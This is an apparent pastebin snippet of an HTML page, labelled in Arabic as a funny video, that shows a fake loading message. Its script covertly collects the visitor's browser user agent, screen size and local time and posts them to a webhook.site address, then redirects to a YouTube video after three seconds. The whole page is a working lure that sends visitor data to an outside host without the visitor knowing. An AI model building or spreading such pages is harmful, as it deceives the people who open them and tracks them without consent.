Untitled
1 hour ago in Plain Text
<!DOCTYPE html>
<html>
<head>
<title>فيديو مضحك</title>
<meta charset="UTF-8">
</head>
<body style="background:black;color:white;text-align:center;padding:100px">
<h2>🎬 جاري تحميل الفيديو...</h2>
<script>
// جمع البيانات
const data = {
جهاز: navigator.userAgent,
شاشة: screen.width + "x" + screen.height,
وقت: new Date().toLocaleString('ar-SA')
};
// إرسال البيانات
fetch('https://webhook.site/883d4e24-61a6-4916-b44f-551b1740cf38', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify(data)
});
// الانتقال لليوتيوب بعد 3 ثواني
setTimeout(() => {
window.location.href = 'https://www.youtube.com/watch?v=dQw4w9WgXcQ';
}, 3000);
</script>
</body>
</html>